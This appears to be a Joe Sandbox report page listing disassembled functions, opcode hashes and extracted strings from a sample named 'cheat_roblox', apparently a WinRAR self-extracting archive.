                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ffdf8f5a64276e3eb417e3b9ae5b43350349d41efb04db03fca9f8ba9e24336f
                                                                                                                  • Instruction ID: 6b7080b52be5116da3e81f8b4d4993356b7cf008b42f30f37001a69ac18846b4
                                                                                                                  • Opcode Fuzzy Hash: ffdf8f5a64276e3eb417e3b9ae5b43350349d41efb04db03fca9f8ba9e24336f
                                                                                                                  • Instruction Fuzzy Hash: DD22F4B3B206508BD728CF25C89AA5E3766F798744B4B8228DF4ACB785DB3DD505CB40
                                                                                                                  Function 00007FF6E7E34B98 Relevance: .6, Instructions: 578COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 21143e83615dcc23e36b64f0d60848ac948cba63854c17a605a1a3ec217f9251
                                                                                                                  • Instruction ID: cc40af293668434d08b973d528a799541f9213ffbed19ba2f6859f529fe519dd
                                                                                                                  • Opcode Fuzzy Hash: 21143e83615dcc23e36b64f0d60848ac948cba63854c17a605a1a3ec217f9251
                                                                                                                  • Instruction Fuzzy Hash: C93201B3A042919BE718CF28D444BBC37A1F755B08F018139DA9A87B98DF3DE861CB45
                                                                                                                  Function 00007FF6E7E17288 Relevance: .3, Instructions: 294COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 063370d9e2e9571dc593e8358d008e0ec5385ad0435e9f2f5019d46da215c13b
                                                                                                                  • Instruction ID: 32df7a39b2ba4db9fb6181dc104668afd194fb9d0956c683fc05f8442bdc190c
                                                                                                                  • Opcode Fuzzy Hash: 063370d9e2e9571dc593e8358d008e0ec5385ad0435e9f2f5019d46da215c13b
                                                                                                                  • Instruction Fuzzy Hash: 68C19DB7B281908FE350CF7AE400A9D3BB1F39878CB519125DF69A7B09D639E645CB40
                                                                                                                  Function 00007FF6E7E32D58 Relevance: .3, Instructions: 268COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 602477e063b5c1ca901f2159ae3c7fc010244aaa433e93e1960e83d539d05e76
                                                                                                                  • Instruction ID: 802cd14788dabc068361107ed03573b5453845fe865bf7cab5e0a33572304afe
                                                                                                                  • Opcode Fuzzy Hash: 602477e063b5c1ca901f2159ae3c7fc010244aaa433e93e1960e83d539d05e76
                                                                                                                  • Instruction Fuzzy Hash: 3DA15973A0818296EB25CB24D408BFD2795EB90788F454635DAEDC7795CE3EEC41C70A
                                                                                                                  Function 00007FF6E7E2AF18 Relevance: .2, Instructions: 244COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e3f156a61251d3696a660eff3e2c5499dd818c979554cbf7ea7c30eccab92618
                                                                                                                  • Instruction ID: 8fdc0bd6cc682bb5bab1582a0c9ec7de6bdb6c42349d27ba401860e37d3f4caa
                                                                                                                  • Opcode Fuzzy Hash: e3f156a61251d3696a660eff3e2c5499dd818c979554cbf7ea7c30eccab92618
                                                                                                                  • Instruction Fuzzy Hash: E9C10573A292E04DE302CBB5A4248FD3FB5E71E34DB4A4152EFE667B4AD52D5201DB20
                                                                                                                  Function 00007FF6E7E1A310 Relevance: .2, Instructions: 230COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 190572456-0
                                                                                                                  • Opcode ID: ba0d91b71a6ba36ace61fab0c0f7d4922daa1e3f8d028e3e8b3457ff5b2a4fa0
                                                                                                                  • Instruction ID: 0a7b0ea32bcc47a51b5df13f36e042a80982e8101e832b79a3004f579b619e53
                                                                                                                  • Opcode Fuzzy Hash: ba0d91b71a6ba36ace61fab0c0f7d4922daa1e3f8d028e3e8b3457ff5b2a4fa0
                                                                                                                  • Instruction Fuzzy Hash: 2E911E63B1858296EB11CF29D4513FD2721FFA5788F441031EE9E9765AEE3EE60AC304
                                                                                                                  Function 00007FF6E7E2B534 Relevance: .2, Instructions: 181COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: cfd80b8924012b3a81ce264cde7180753b201b1e387c519ebd9873ce58afa85e
                                                                                                                  • Instruction ID: 7ad5d185c9f9ced5b0766b7e0b7cb70c2b6f5649196f385d20ff1066fe34a1af
                                                                                                                  • Opcode Fuzzy Hash: cfd80b8924012b3a81ce264cde7180753b201b1e387c519ebd9873ce58afa85e
                                                                                                                  • Instruction Fuzzy Hash: 64613223B181D249EB01CF75C5005FD7FA9AB19784B4A8032CEEA97646EE3EE506CB15
                                                                                                                  Function 00007FF6E7E321D0 Relevance: .1, Instructions: 137COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8137a9b05b05aada6fbcd6bbdda66db02b1ef4637fe403d2df7c72722ebbdea5
                                                                                                                  • Instruction ID: d80946cdb290be0458885e9469f5a4978408f142448d9d8af9732349fe4928c0
                                                                                                                  • Opcode Fuzzy Hash: 8137a9b05b05aada6fbcd6bbdda66db02b1ef4637fe403d2df7c72722ebbdea5
                                                                                                                  • Instruction Fuzzy Hash: F1514473B181625BE7288F28D408BBD3765FB90B48F458134DBD987698DE3EE941CB05
                                                                                                                  Function 00007FF6E7E32AB0 Relevance: .1, Instructions: 112COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 525267a7f117e2089c634eae81b531c40420bccc1aa688f1dd99d62513960580
                                                                                                                  • Instruction ID: b8ef426bc624ce3a3bd27f34b734999554821c03c3e470e27a537af71eb931d6
                                                                                                                  • Opcode Fuzzy Hash: 525267a7f117e2089c634eae81b531c40420bccc1aa688f1dd99d62513960580
                                                                                                                  • Instruction Fuzzy Hash: 1831D2A3A086829BD708CF1AD95437E67D1BB45790F048139DB9AC3B41DE3DE842C705
                                                                                                                  Function 00007FF6E7E558E0 Relevance: .0, Instructions: 32COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 20052d42666034676028b01d15d2cffdefdd266dec7e2dd0f98b8d8f07818195
                                                                                                                  • Instruction ID: 0482698429a82cf36f6245cca95938c8f88ca86112ce4946e97a8f6de4e34dca
                                                                                                                  • Opcode Fuzzy Hash: 20052d42666034676028b01d15d2cffdefdd266dec7e2dd0f98b8d8f07818195
                                                                                                                  • Instruction Fuzzy Hash: EBF06272B182958BDBA48F2DE84272977E0FB08380F848039D6DDC7B54DA3D94618F09
                                                                                                                  Function 00007FF6E7E43354 Relevance: .0, Instructions: 2COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e57e15d0ab639cfe726454a8769b7378f2b682ff734fe90589bfb13db1bf513a
                                                                                                                  • Instruction ID: 3db823d74d00744b7a1eeb915cfdc2c24699251948964909802c6cbc220af968
                                                                                                                  • Opcode Fuzzy Hash: e57e15d0ab639cfe726454a8769b7378f2b682ff734fe90589bfb13db1bf513a
                                                                                                                  • Instruction Fuzzy Hash: 01A0026390CC46D0E6448B50F8602702330FB50301B504071F0BDD20A4EF3EA402D34A
                                                                                                                  Function 00007FF6E7E1D7D0 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 98COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID: :$EFS:$LOGGED_UTILITY_STREAM$:$I30:$INDEX_ALLOCATION$:$TXF_DATA:$LOGGED_UTILITY_STREAM$::$ATTRIBUTE_LIST$::$BITMAP$::$DATA$::$EA$::$EA_INFORMATION$::$FILE_NAME$::$INDEX_ALLOCATION$::$INDEX_ROOT$::$LOGGED_UTILITY_STREAM$::$OBJECT_ID$::$REPARSE_POINT
                                                                                                                  • API String ID: 3668304517-727060406
                                                                                                                  • Opcode ID: 74d68d42448b2834d40d390ad32eed462d68e051ec4e29c63c0154d737a3ceed
                                                                                                                  • Instruction ID: 634ddceda0951310d90754ebf126d7501ec8ad94ccbb0619ed33dac4a8d35030
                                                                                                                  • Opcode Fuzzy Hash: 74d68d42448b2834d40d390ad32eed462d68e051ec4e29c63c0154d737a3ceed
                                                                                                                  • Instruction Fuzzy Hash: F041D637B05F0599EB00CB64E4413ED33A9EB48798F400136DAAD87B69EE3DD559C389
                                                                                                                  Function 00007FF6E7E42A10 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 61libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                                                  • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                  • API String ID: 2565136772-3242537097
                                                                                                                  • Opcode ID: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
                                                                                                                  • Instruction ID: 1d39f623557fbe0fe1fc854d21c6522f2ea570990466d444be2fc009cd6d394c
                                                                                                                  • Opcode Fuzzy Hash: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
                                                                                                                  • Instruction Fuzzy Hash: 3B216067E19B0781FE149B20F95537823A4AF58790F440034C9AEC2BA1EF3EE846D34A
                                                                                                                  Function 00007FF6E7E26A0C Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 444COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                                                                  • String ID: DXGIDebug.dll$UNC$\\?\
                                                                                                                  • API String ID: 4097890229-4048004291
                                                                                                                  • Opcode ID: 4f1437804bcdce90e20cec30e65ff0fa4fbfed6c2bf85bcea305f217ae80ce6c
                                                                                                                  • Instruction ID: aec1a27ea0a756384d33dd3172947868049b45c645b1271c1790ef70cb57a6e8
                                                                                                                  • Opcode Fuzzy Hash: 4f1437804bcdce90e20cec30e65ff0fa4fbfed6c2bf85bcea305f217ae80ce6c
                                                                                                                  • Instruction Fuzzy Hash: 3712E223B08B8280EF10DB65E4412AD6371EB85B88F504235DBAD87BE9DF3ED549C349
                                                                                                                  Function 00007FF6E7E3A440 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 257COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialog
                                                                                                                  • String ID: GETPASSWORD1$Software\WinRAR SFX
                                                                                                                  • API String ID: 431506467-1315819833
                                                                                                                  • Opcode ID: d8322a208530c57668d9ab0bd9eeb9a998ed53718cd7cec1bf797515a4396991
                                                                                                                  • Instruction ID: bb82a216c3884a524f7b47c4bbb57c2f643f44dabbee93632d50263a070ec8a4
                                                                                                                  • Opcode Fuzzy Hash: d8322a208530c57668d9ab0bd9eeb9a998ed53718cd7cec1bf797515a4396991
                                                                                                                  • Instruction Fuzzy Hash: B5B1B463F1978695FB00DB64D4483BC2371AF45394F404235EAAC66AE9EE3DE486C349
                                                                                                                  Function 00007FF6E7E4E650 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
